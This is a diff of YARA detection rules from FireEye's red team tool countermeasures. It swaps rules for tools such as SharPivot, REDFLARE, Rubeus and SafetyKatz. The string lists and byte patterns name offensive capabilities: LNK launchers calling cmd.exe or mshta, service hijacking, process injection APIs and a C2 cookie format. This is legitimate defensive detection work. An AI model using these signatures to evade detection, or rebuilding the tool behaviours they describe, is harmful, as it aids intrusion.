 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LNKSMASHER/supplemental/yara/Hunting_LNK_Win_GenericLauncher.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPIVOT/production/yara/HackTool_MSIL_SharPivot_1.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "14dd758e8f89f14612c8df9f862c31e4"
-		logic_hash = "a654cd3594e2d09950fb11bf8721a5cdb89f5d5be6e706f12e18c7fcdf7dd0fe"
-		score = 60
-		quality = 53
+		hash = "e4efa759d425e2f26fbc29943a30f5bd"
+		logic_hash = "1c71b9641e30c9764f3503e49f8f85472d7e62384c8dd2b420c4fa2b2fccda4f"
+		score = 75
+		quality = 75
 		tags = "FILE"
-		rev = 7
+		rev = 3
 
 	strings:
-		$a01 = "cmd.exe /" ascii nocase wide
-		$a02 = "cscript" ascii nocase wide
-		$a03 = "jscript" ascii nocase wide
-		$a04 = "wscript" ascii nocase wide
-		$a05 = "wmic" ascii nocase wide
-		$a07 = "mshta" ascii nocase wide
-		$header = { 4C 00 00 00 01 14 02 }
+		$s2 = { 73 ?? 00 00 0A 0A 06 1F ?? 1F ?? 6F ?? 00 00 0A 0B 73 ?? 00 00 0A 0C 16 13 04 2B 5E 23 [8] 06 6F ?? 00 00 0A 5A 23 [8] 58 28 ?? 00 00 0A 28 ?? 00 00 0A 28 ?? 00 00 0A }
+		$s3 = "cmd_rpc" wide
+		$s4 = "costura"
 
 	condition:
-		(( $header at 0 ) or ( ( uint32( 0 ) == 0xE011CFD0 ) and $header ) ) and ( 1 of ( $a* ) )
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_PXELOOT_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Sharpivot_3 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the PXE And Loot project."
+		description = "This rule looks for .NET PE files that have the strings of various method names in the SharPivot code."
 		author = "FireEye"
-		id = "5a72a6ff-bae4-57f5-a19b-a4595ac57293"
-		date = "2020-12-09"
-		modified = "2020-12-09"
+		id = "616333fc-4075-5f04-823a-1164717a2b87"
+		date = "2020-12-10"
+		modified = "2020-12-10"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PXELOOT/production/yara/HackTool_MSIL_PXELOOT_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPIVOT/production/yara/HackTool_MSIL_SharPivot_3.yar#L4-L31"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "82e33011ac34adfcced6cddc8ea56a81"
-		logic_hash = "c9892adcb9ff5471235e45988f6662d3b8f984fdafca7024a5781eed50f6c0b3"
+		hash = "e4efa759d425e2f26fbc29943a30f5bd"
+		logic_hash = "ecf13e47e409efd68b508735a84be6a1627f5b0c0cea6b90434fc9ba5b1d8cf5"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 7
+		rev = 3
 
 	strings:
-		$typelibguid1 = "78B2197B-2E56-425A-9585-56EDC2C797D6" ascii nocase wide
+		$msil = "_CorExeMain" ascii wide
+		$str1 = "SharPivot" ascii wide
+		$str2 = "ParseArgs" ascii wide
+		$str3 = "GenRandomString" ascii wide
+		$str4 = "ScheduledTaskExists" ascii wide
+		$str5 = "ServiceExists" ascii wide
+		$str6 = "lpPassword" ascii wide
+		$str7 = "execute" ascii wide
+		$str8 = "WinRM" ascii wide
+		$str9 = "SchtaskMod" ascii wide
+		$str10 = "PoisonHandler" ascii wide
+		$str11 = "SCShell" ascii wide
+		$str12 = "SchtaskMod" ascii wide
+		$str13 = "ServiceHijack" ascii wide
+		$str14 = "commandArg" ascii wide
+		$str15 = "payloadPath" ascii wide
+		$str16 = "Schtask" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and all of ( $str* )
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_DTRIM_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Sharpivot_2 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'dtrim' project, which is a modified version of SharpSploit."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "9be695a1-6d18-5952-974c-96a30f035e7a"
+		id = "8d6d28ce-de3a-5a38-b654-ba1372d47568"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DTRIM/production/yara/APT_HackTool_MSIL_DTRIM_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPIVOT/production/yara/HackTool_MSIL_SharPivot_2.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "357c1f76631ec9ee342995cd12369fd9ff18c541bffe6f5464b1e8db45057196"
+		hash = "e4efa759d425e2f26fbc29943a30f5bd"
+		logic_hash = "14e4a29a32e8441a6f7f322e09cd9bb9822ae47eaa1fdf8e09c90998b03658f5"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 3
 
 	strings:
-		$typelibguid0 = "7760248f-9247-4206-be42-a6952aa46da2" ascii nocase wide
+		$s1 = "costura"
+		$s2 = "cmd_schtask" wide
+		$s3 = "cmd_wmi" wide
+		$s4 = "cmd_rpc" wide
+		$s5 = "GoogleUpdateTaskMachineUA" wide
+		$s6 = "servicehijack" wide
+		$s7 = "poisonhandler" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Loader_MSIL_Netassemblyinject_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Sharpivot_4 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'NET-Assembly-Inject' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the SharPivot project."
 		author = "FireEye"
-		id = "62a7dc4c-678b-5f13-9661-4679eafe1c72"
+		id = "c1bd64da-6a54-5bc6-8a89-9c8a93dd965c"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/NETASSEMBLYINJECT/production/yara/Loader_MSIL_NETAssemblyInject_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPIVOT/production/yara/HackTool_MSIL_SharPivot_4.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "9a43df9ee26a44f4db5c2d22fbc1a6c86c5af0c9d44a79c6627a4cc8cf31bb8d"
+		hash = "e4efa759d425e2f26fbc29943a30f5bd"
+		logic_hash = "7ef883148926d5786861e5e81b1e645aa2e3ca06bd663f2b5f32e04b5852a218"
 		score = 75
-		quality = 69
+		quality = 73
 		tags = "FILE"
-		rev = 2
+		rev = 3
 
 	strings:
-		$typelibguid0 = "af09c8c3-b271-4c6c-8f48-d5f0e1d1cac6" ascii nocase wide
-		$typelibguid1 = "c5e56650-dfb0-4cd9-8d06-51defdad5da1" ascii nocase wide
-		$typelibguid2 = "e8fa7329-8074-4675-9588-d73f88a8b5b6" ascii nocase wide
+		$typelibguid1 = "44B83A69-349F-4A3E-8328-A45132A70D62" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
 }
-rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_2 : FILE
+rule FIREEYE_RT_Tool_MSIL_Sharpgrep_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharpGrep' project."
 		author = "FireEye"
-		id = "84881e5c-05df-5911-af42-ec82e559588c"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "c7569d33-f57d-5f9c-aa2a-78866c680b5b"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_2.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPPGREP/production/yara/Tool_MSIL_SharpGrep_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "9529c4c9773392893a8a0ab8ce8f8ce1,05b99d438dac63a5a993cea37c036673"
-		logic_hash = "1f2e1f644b1932486444dfda30b7dad7f50121f59fa493eb8a1a0528ae46db26"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "c22bfc50b3ab3c4082006aad3c3c89684cffe1e429b001b0bb08758856a47d04"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 2
+		rev = 1
 
 	strings:
-		$1 = "initialize" fullword
-		$2 = "getData" fullword
-		$3 = "putData" fullword
-		$4 = "fini" fullword
-		$5 = "Cookie: SID1=%s" fullword
+		$typelibguid0 = "f65d75b5-a2a6-488f-b745-e67fc075f445" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Loader_Raw64_REDFLARE_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Corehound_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'CoreHound' project."
 		author = "FireEye"
-		id = "8e937f6a-404f-53bd-9de2-ed63b1cf48b2"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "8c914b34-3e3d-53ae-a5e4-9dbfdff45a24"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Raw64_REDFLARE_1.yar#L4-L16"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/COREHOUND/production/yara/HackTool_MSIL_CoreHound_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "5e14f77f85fd9a5be46e7f04b8a144f5"
-		logic_hash = "dac122ccece8a6dd35a5fe9d37860a612aa50ab469b79f4375dbe776f60c7b57"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "b0f759709428d5c9404507a13259bf85cb8c405d38b807539098f7cc871023d8"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$load = { EB ?? 58 48 8B 10 4C 8B 48 ?? 48 8B C8 [1-10] 48 83 C1 ?? 48 03 D1 FF }
+		$typelibguid0 = "1fff2aee-a540-4613-94ee-4f208b30c599" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) != 0x5A4D ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Downloader_Win32_REDFLARE_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_JUSTASK_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'justask' project."
 		author = "FireEye"
-		id = "e8d7ee31-568e-58ac-98ad-49baa2eb37ea"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "06a03d82-db69-5b5a-a578-a8053814e917"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Downloader_Win32_REDFLARE_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/JUSTASK/production/yara/APT_HackTool_MSIL_JUSTASK_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "05b99d438dac63a5a993cea37c036673"
-		logic_hash = "a340a2a732a9b1aa74ca9d84009a88d1b14b6a03140a859384c0d6e745e4a90a"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "24d2f8e3838c4f02cd80644a396ce7cf105761d2feba54e39973564ca5e97571"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 2
 
 	strings:
-		$const = "Cookie: SID1=%s" fullword
-		$http_req = { 00 00 08 80 81 3D [4] BB 01 00 00 75 [1-10] 00 00 80 00 [1-4] 00 10 00 00 [1-4] 00 20 00 00 89 [1-10] 6A 00 8B [1-8] 5? 6A 00 6A 00 6A 00 8B [1-8] 5? 68 [4] 8B [1-8] 5? FF 15 [4-40] 6A 14 E8 }
+		$typelibguid0 = "aa59be52-7845-4fed-9ea5-1ea49085d67a" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Downloader_Win64_REDFLARE_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_SAFETYKATZ_4 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SafetyKatz project."
 		author = "FireEye"
-		id = "15a5e22b-84b0-5b36-8772-1d496ac447b2"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "e160b75d-cc39-5e16-86e1-cba9fe64a6b6"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Downloader_Win64_REDFLARE_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SAFETYKATZ/production/yara/HackTool_MSIL_SAFETYKATZ_4.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "9529c4c9773392893a8a0ab8ce8f8ce1"
-		logic_hash = "1b9bece6083403615841c752eac48fd20095e918d6e175563dd122be2885d875"
+		hash = "45736deb14f3a68e88b038183c23e597"
+		logic_hash = "a02b4acea691d485f427ed26487f2f601065901324a8dcd6cd8de9502d8cd897"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 2
+		rev = 3
 
 	strings:
-		$const = "Cookie: SID1=%s" fullword
-		$http_req = { 00 00 08 80 81 3D [4] BB 01 00 00 75 [1-10] 00 00 80 00 [1-4] 00 10 00 00 [1-4] 00 20 00 00 89 [6-20] 00 00 00 00 [6-20] 00 00 00 00 [2-10] 00 00 00 00 45 33 C9 [4-20] 48 8D 15 [4] 48 8B 0D [4] FF 15 [4-50] B9 14 00 00 00 E8 }
+		$typelibguid1 = "8347E81B-89FC-42A9-B22C-F59A6A572DEC" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
 }
-rule FIREEYE_RT_APT_Builder_PY_REDFLARE_1
+rule FIREEYE_RT_Loader_MSIL_Netassemblyinject_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'NET-Assembly-Inject' project."
 		author = "FireEye"
-		id = "3b5ad25d-ce66-572e-9a91-40a73b8fd447"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "62a7dc4c-678b-5f13-9661-4679eafe1c72"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Builder_PY_REDFLARE_1.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/NETASSEMBLYINJECT/production/yara/Loader_MSIL_NETAssemblyInject_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "d0a830403e56ebaa4bfbe87dbfdee44f"
-		logic_hash = "1948cadb7242eb69bffbc222802ce9c1af38d7a846da09b6343b1449fe054e42"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "9a43df9ee26a44f4db5c2d22fbc1a6c86c5af0c9d44a79c6627a4cc8cf31bb8d"
 		score = 75
-		quality = 75
-		tags = ""
-		rev = 1
+		quality = 69
+		tags = "FILE"
+		rev = 2
 
 	strings:
-		$1 = "LOAD_OFFSET_32 = 0x612"
-		$2 = "LOAD_OFFSET_64 = 0x611"
-		$3 = "class RC4:"
-		$4 = "struct.pack('<Q' if is64b else '<L'"
-		$5 = "stagerConfig['comms']['config']"
-		$6 = "_x86.dll"
-		$7 = "_x64.dll"
+		$typelibguid0 = "af09c8c3-b271-4c6c-8f48-d5f0e1d1cac6" ascii nocase wide
+		$typelibguid1 = "c5e56650-dfb0-4cd9-8d06-51defdad5da1" ascii nocase wide
+		$typelibguid2 = "e8fa7329-8074-4675-9588-d73f88a8b5b6" ascii nocase wide
 
 	condition:
-		all of them and @1 [ 1 ] < @2 [ 1 ] and @2 [ 1 ] < @3 [ 1 ] and @3 [ 1 ] < @4 [ 1 ] and @4 [ 1 ] < @5 [ 1 ]
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_1 : FILE
+rule FIREEYE_RT_Loader_MSIL_Sharpy_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharPy' project."
 		author = "FireEye"
-		id = "c3054680-9c87-5d90-b78e-b260904340df"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "7c7bda22-bacc-5901-a650-a30c9cfcdee7"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_1.yar#L4-L21"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPY/production/yara/Loader_MSIL_SharPy_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "100d73b35f23b2fe84bf7cd37140bf4d,4e7e90c7147ee8aa01275894734f4492"
-		logic_hash = "08ea2151418f7f75a8b138146c393a5ea85647320cc8e9fe1930d75871ab94bb"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "0f73fab3905b4961b8dbeb120d45a34a2383ecdaae0296f38e34f8b7ab4aeee8"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$1 = "initialize" fullword
-		$2 = "runCommand" fullword
-		$3 = "stop" fullword
-		$4 = "fini" fullword
-		$5 = "VirtualAllocEx" fullword
-		$6 = "WriteProcessMemory" fullword
+		$typelibguid0 = "f6cf1d3b-3e43-4ecf-bb6d-6731610b4866" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_7 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Rubeus_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public Rubeus project."
 		author = "FireEye"
-		id = "f891e477-9ff2-57be-9ca5-dd87d9baee29"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "0ca140ea-2b9f-5904-a4c0-8615229626f0"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_7.yar#L4-L21"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/RUBEUS/production/yara/HackTool_MSIL_Rubeus_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "e7beece34bdf67cbb8297833c5953669, 8025bcbe3cc81fc19021ad0fbc11cf9b"
-		logic_hash = "6d7822256ac1bef05304d3396df773e2b20a397311ad820d6ec5fe4cb6bdfbbc"
+		hash = "66e0681a500c726ed52e5ea9423d2654"
+		logic_hash = "ad954f9922ab564d68cb4515b080f6ee69476a8d87f0038e2ae4c222f0e182d7"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 4
 
 	strings:
-		$1 = "initialize" fullword
-		$2 = "getData" fullword
-		$3 = "putData" fullword
-		$4 = "fini" fullword
-		$5 = "NamedPipe"
-		$named_pipe = { 88 13 00 00 [1-8] E8 03 00 00 [20-60] 00 00 00 00 [1-8] 00 00 00 00 [1-40] ( 6A 00 6A 00 6A 03 6A 00 6A 00 68 | 00 00 00 00 [1-6] 00 00 00 00 [1-6] 03 00 00 00 45 33 C? 45 33 C? BA ) 00 00 00 C0 [2-10] FF 15 [4-30] FF 15 [4-7] E7 00 00 00 [4-40] FF 15 [4] 85 C0 }
+		$typelibguid = "658C8B7F-3664-4A95-9572-A3E5871DFC06" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5A4D and $typelibguid
 }
-rule FIREEYE_RT_APT_Loader_Win64_REDFLARE_1 : FILE
+rule FIREEYE_RT_Loader_MSIL_Csharpsectioninjection_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'C_Sharp_SectionInjection' project."
 		author = "FireEye"
-		id = "dc162f26-66d3-5359-b1d7-ef2208b359e2"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "ca5bf5cd-1950-53ed-8984-e880a15e658e"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win64_REDFLARE_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSECTIONINJECTION/production/yara/Loader_MSIL_CSharpSectionInjection_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "f20824fa6e5c81e3804419f108445368"
-		logic_hash = "2cae245a6aa36dccc2228cccefdc4ca0eb278901f063e072a369000f67d73a55"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "011cf4dffe6ef90a79cdfabb0e297152c00b0404b1801f56fd7e703ab90b1692"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 2
 
 	strings:
-		$alloc_n_load = { 41 B9 40 00 00 00 41 B8 00 30 00 00 33 C9 [1-10] FF 50 [4-80] F3 A4 [30-120] 48 6B C9 28 [3-20] 48 6B C9 28 }
-		$const_values = { 0F B6 ?? 83 C? 20 83 F? 6D [2-20] 83 C? 20 83 F? 7A }
+		$typelibguid0 = "d77135da-0496-4b5c-9afe-e1590a4c136a" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Loader_Raw32_REDFLARE_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Keepersist_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'KeePersist' project."
 		author = "FireEye"
-		id = "8f8ec27f-afac-5da5-b76f-b984e14e0066"
-		date = "2020-11-27"
-		date = "2020-11-27"
